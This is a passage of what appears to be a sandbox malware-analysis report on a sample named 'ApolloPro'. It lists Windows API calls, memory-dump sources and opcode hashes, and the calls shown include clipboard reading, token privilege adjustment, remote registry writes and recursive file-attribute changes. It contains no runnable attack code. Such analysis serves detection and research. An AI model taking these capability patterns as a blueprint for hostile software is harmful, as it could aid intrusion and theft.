• API String ID: 1396898556-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 006A4998
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
APIs
                                                                                              Similarity
                                                                                              • API ID: _fseek
                                                                                              • String ID:
                                                                                              • API String ID: 2937370855-0
                                                                                              • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction ID: 3db07aa804f7cc87638f41e059ec0c24568e9c0dddaff37121ca81db58abcf31
                                                                                              • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                              • Instruction Fuzzy Hash: F0F085B6800208BFDF109F84DC05DEBBB7AEF89320F00459CF9045A210D232EA258BA0
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,?,006427AF,?,00000001), ref: 00644A63
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 5ebae91a70416a57364d0bfecee3f7616bb8ec980b0519142b96ab09dc2bf78f
                                                                                              • Instruction ID: 1a22fb4caa1c4a82539bc906ffbe3596d008a5008b6e605a771df751b5835e5a
                                                                                              • Opcode Fuzzy Hash: 5ebae91a70416a57364d0bfecee3f7616bb8ec980b0519142b96ab09dc2bf78f
                                                                                              • Instruction Fuzzy Hash: CEF01571145701CFCB349F64E495966BBF2AF14366324992EE1D783614CB31A984DB44
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction ID: 2494a5860772135cd878e2d76efaf2dec09b05c5b4fb45b0a490206e0ede8303
                                                                                              • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                              • Instruction Fuzzy Hash: 3DF0F87240020DFFDF45DF90C945EAABB7AFB14314F208589FD198A212D736EA61AB91
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006509E4
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2514874351-0
                                                                                              • Opcode ID: b0eae063db7e72ec56613ae3ea9a5b26949dc1a0b02212c4e4cac653ad121c2c
                                                                                              • Instruction ID: d18303f4eca1f52f8f5a9ecd36b045c8eaafcb04e2734525357ef365ca8a1b24
                                                                                              • Opcode Fuzzy Hash: b0eae063db7e72ec56613ae3ea9a5b26949dc1a0b02212c4e4cac653ad121c2c
                                                                                              • Instruction Fuzzy Hash: F5E086329001285BC72196989C05FEA77DEDB89690F0401B6FC0CD7204D961AC8186D5
                                                                                              APIs
                                                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00694D31
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderPath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 3334745507-0
                                                                                              • Opcode ID: 75434047ef37ae135498114ee77c57fb48fefe9fb48013fa1cf70620ccbe7a1d
                                                                                              • Instruction ID: bab84d9cbbad45a9befe4c473b1f2a127b4e8692d921ed6d18face509ed9c692
                                                                                              • Opcode Fuzzy Hash: 75434047ef37ae135498114ee77c57fb48fefe9fb48013fa1cf70620ccbe7a1d
                                                                                              • Instruction Fuzzy Hash: C3D05EA190032C6FEB64E6A49C0DDFB7BADD744221F0006A57C5CC3101E9249D8586E0
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 006977DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: e8bc4638f8319601b8a5c1c78193cf6803990f4384c4ca5b72dc710f2fca9e23
                                                                                              • Instruction ID: c63a24d81da3cdcba82e17979b11689c89173aa6a3bf2700f9a26570f3968722
                                                                                              • Opcode Fuzzy Hash: e8bc4638f8319601b8a5c1c78193cf6803990f4384c4ca5b72dc710f2fca9e23
                                                                                              • Instruction Fuzzy Hash: BED01271438318BF6B2C8BA4DC46CB7769DE905221340136EB805C1A00E6A1BC0086A0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction ID: d7eaa209e6e0ca8a2f90be560d394540787a1ba0556148270b7179fd8c4193cb
                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction Fuzzy Hash: ACB0927644020C77CE012A82EC03A693B6A9B40769F408020FF0C1C162A673A6A49689
                                                                                              APIs
                                                                                              • _doexit.LIBCMT ref: 00653592
                                                                                                • Part of subcall function 00653459: __lock.LIBCMT ref: 00653467
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(006ECB70,0000001C,006533B2,00651003,00000001,00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534A6
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534B7
                                                                                                • Part of subcall function 00653459: EncodePointer.KERNEL32(00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534D0
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(-00000004,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534E0
                                                                                                • Part of subcall function 00653459: EncodePointer.KERNEL32(00000000,?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534E6
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 006534FC
                                                                                                • Part of subcall function 00653459: DecodePointer.KERNEL32(?,00653300,000000FF,?,00659E5E,00000011,00651003,?,00659CAC,0000000D), ref: 00653507
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 2158581194-0
                                                                                              • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction ID: 39f4fe3bfac32020100cff6ab00b2b3f1ef3585aa94896713844ed1314575325
                                                                                              • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                              • Instruction Fuzzy Hash: 0EB0123198030C33DA112541EC03F193B4D4740F90F100020FE0C1C2E1A5E3766445CD
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006BD208
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006BD249
                                                                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 006BD28E
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006BD2B8
                                                                                              • SendMessageW.USER32 ref: 006BD2E1
                                                                                              • _wcsncpy.LIBCMT ref: 006BD359
                                                                                              • GetKeyState.USER32(00000011), ref: 006BD37A
                                                                                              • GetKeyState.USER32(00000009), ref: 006BD387
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006BD39D
                                                                                              • GetKeyState.USER32(00000010), ref: 006BD3A7
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006BD3D0
                                                                                              • SendMessageW.USER32 ref: 006BD3F7
                                                                                              • SendMessageW.USER32(?,00001030,?,006BB9BA), ref: 006BD4FD
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006BD513
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006BD526
                                                                                              • SetCapture.USER32(?), ref: 006BD52F
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD594
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006BD5A1
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006BD5BB
                                                                                              • ReleaseCapture.USER32 ref: 006BD5C6
                                                                                              • GetCursorPos.USER32(?), ref: 006BD600
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BD60D
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 006BD669
                                                                                              • SendMessageW.USER32 ref: 006BD697
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 006BD6D4
                                                                                              • SendMessageW.USER32 ref: 006BD703
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006BD724
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006BD733
                                                                                              • GetCursorPos.USER32(?), ref: 006BD753
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BD760
                                                                                              • GetParent.USER32(?), ref: 006BD780
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 006BD7E9
                                                                                              • SendMessageW.USER32 ref: 006BD81A
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD878
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006BD8A8
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 006BD8D2
                                                                                              • SendMessageW.USER32 ref: 006BD8F5
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD947
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006BD97B
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BDA17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3977979337-4164748364
                                                                                              • Opcode ID: 6c59736951e9ac04c972658cfce8b6509d76795e502655337f6f6f3097c26d84
                                                                                              • Instruction ID: f8973d7f1b7296c71ba380608232dcba75e7bac76028ca0aac96903c1c71b304
                                                                                              • Opcode Fuzzy Hash: 6c59736951e9ac04c972658cfce8b6509d76795e502655337f6f6f3097c26d84
                                                                                              • Instruction Fuzzy Hash: 31428BB0205241EFD724DF28C844FEABBE6FF49350F140619F6958B3A1E771A895CB92
APIs
  • Part of subcall function 00689399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
  • Part of subcall function 00689399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
  • Part of subcall function 00689399: GetLastError.KERNEL32 ref: 0068941D
• _memset.LIBCMT ref: 00688F71
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00688FC3
• CloseHandle.KERNEL32(?), ref: 00688FD4
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00688FEB
• GetProcessWindowStation.USER32 ref: 00689004
• SetProcessWindowStation.USER32(00000000), ref: 0068900E
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00689028
  • Part of subcall function 00688DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00688F27), ref: 00688DFE
  • Part of subcall function 00688DE9: CloseHandle.KERNEL32(?,?,00688F27), ref: 00688E10
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: e00d11ae145e26512ef13691f51d4de90c80707f867da1e8b47dd92b22c5468e
• Instruction ID: a7162a9903a38be6484cb111867c8864b444c186e41d820a586e8c0a2ec60d33
• Opcode Fuzzy Hash: e00d11ae145e26512ef13691f51d4de90c80707f867da1e8b47dd92b22c5468e
• Instruction Fuzzy Hash: 1681597190420AFFEF11AFA4CC49EFE7B7AAF04304F184219F954A6261DB318E15DB20
APIs
• OpenClipboard.USER32(006C0980), ref: 006A465C
• IsClipboardFormatAvailable.USER32(0000000D), ref: 006A466A
• GetClipboardData.USER32(0000000D), ref: 006A4672
• CloseClipboard.USER32 ref: 006A467E
• GlobalLock.KERNEL32(00000000), ref: 006A469A
• CloseClipboard.USER32 ref: 006A46A4
• GlobalUnlock.KERNEL32(00000000), ref: 006A46B9
• IsClipboardFormatAvailable.USER32(00000001), ref: 006A46C6
• GetClipboardData.USER32(00000001), ref: 006A46CE
• GlobalLock.KERNEL32(00000000), ref: 006A46DB
• GlobalUnlock.KERNEL32(00000000), ref: 006A470F
• CloseClipboard.USER32 ref: 006A481F
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 49b831ce670b16434491f0a51c4bc8ed8621ecdffa479597c78f7239dbdd9d32
• Instruction ID: 595682c5167e20999f64df16d6fb9401aff97d372c2422925c4fbd4d3eeffb18
• Opcode Fuzzy Hash: 49b831ce670b16434491f0a51c4bc8ed8621ecdffa479597c78f7239dbdd9d32
• Instruction Fuzzy Hash: 7651AB31204201ABE300FF24EC89F7E77AAAFC6B01F10552DF656962A1DFB4DD058B66
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0069F5F9
• _wcscmp.LIBCMT ref: 0069F60E
• _wcscmp.LIBCMT ref: 0069F625
• GetFileAttributesW.KERNEL32(?), ref: 0069F637
• SetFileAttributesW.KERNEL32(?,?), ref: 0069F651
• FindNextFileW.KERNEL32(00000000,?), ref: 0069F669
• FindClose.KERNEL32(00000000), ref: 0069F674
• FindFirstFileW.KERNEL32(*.*,?), ref: 0069F690
• _wcscmp.LIBCMT ref: 0069F6B7
• _wcscmp.LIBCMT ref: 0069F6CE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0069F6E0
• SetCurrentDirectoryW.KERNEL32(006EB578), ref: 0069F6FE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0069F708
• FindClose.KERNEL32(00000000), ref: 0069F715
• FindClose.KERNEL32(00000000), ref: 0069F727
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*$Si
• API String ID: 1803514871-2960267604
• Opcode ID: 26b812378e207cd783b25acf7e2d0738c26191beffab6c7871d3ead01428e19d
• Instruction ID: 09d92c74f827624230da2696e2a55bbca04d8983051f85755942075f97f51cc0
• Opcode Fuzzy Hash: 26b812378e207cd783b25acf7e2d0738c26191beffab6c7871d3ead01428e19d
• Instruction Fuzzy Hash: B531F371A01319AAEF109FB4EC49EEE73AEEF09321F150165F804D22A0DB74CE44CA64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0069CDD0
• FindClose.KERNEL32(00000000), ref: 0069CE24
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0069CE49
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0069CE60
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0069CE87
• __swprintf.LIBCMT ref: 0069CED3
• __swprintf.LIBCMT ref: 0069CF16
  • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
• __swprintf.LIBCMT ref: 0069CF6A
  • Part of subcall function 006538C8: __woutput_l.LIBCMT ref: 00653921
• __swprintf.LIBCMT ref: 0069CFB8
  • Part of subcall function 006538C8: __flsbuf.LIBCMT ref: 00653943
  • Part of subcall function 006538C8: __flsbuf.LIBCMT ref: 0065395B
• __swprintf.LIBCMT ref: 0069D007
• __swprintf.LIBCMT ref: 0069D056
• __swprintf.LIBCMT ref: 0069D0A5
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: 7fc50c78fd389ec7b41c415097476e8427bd52653e8268109ae3484ba2ed0a43
• Instruction ID: 5dac62b5b0a34c9635f4dfacc7a54802332e50c28bcf0593a1d65e11bb6d1d06
• Opcode Fuzzy Hash: 7fc50c78fd389ec7b41c415097476e8427bd52653e8268109ae3484ba2ed0a43
• Instruction Fuzzy Hash: E8A16DB1408304ABD754EFA4D885DAFB7EEEF95700F40091DF58587291EB34EA48CBA6
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B0FB3
• RegCreateKeyExW.ADVAPI32(?,?,00000000,006C0980,00000000,?,00000000,?,?), ref: 006B1021
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006B1069
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006B10F2
• RegCloseKey.ADVAPI32(?), ref: 006B1412
• RegCloseKey.ADVAPI32(00000000), ref: 006B141F
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: 4cc9e65b1d688230c09c81e85a8cfcbfd729dbfdb088726b984dd6b45afeb806
• Instruction ID: 3a797cda5a229b78d7de2cc4c4c8015032831aa6c8d6e2b04b8ec81b66d4399e
• Opcode Fuzzy Hash: 4cc9e65b1d688230c09c81e85a8cfcbfd729dbfdb088726b984dd6b45afeb806
• Instruction Fuzzy Hash: C4027A71600611AFCB54EF25C895E6AB7E6FF89710F04895CF88A9B362CB30ED41CB85
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0069F756
• _wcscmp.LIBCMT ref: 0069F76B
• _wcscmp.LIBCMT ref: 0069F782
  • Part of subcall function 00694875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00694890
• FindNextFileW.KERNEL32(00000000,?), ref: 0069F7B1
• FindClose.KERNEL32(00000000), ref: 0069F7BC
• FindFirstFileW.KERNEL32(*.*,?), ref: 0069F7D8
• _wcscmp.LIBCMT ref: 0069F7FF
• _wcscmp.LIBCMT ref: 0069F816
• SetCurrentDirectoryW.KERNEL32(?), ref: 0069F828
• SetCurrentDirectoryW.KERNEL32(006EB578), ref: 0069F846
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0069F850
• FindClose.KERNEL32(00000000), ref: 0069F85D
• FindClose.KERNEL32(00000000), ref: 0069F86F
Strings
Memory Dump Source
• Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
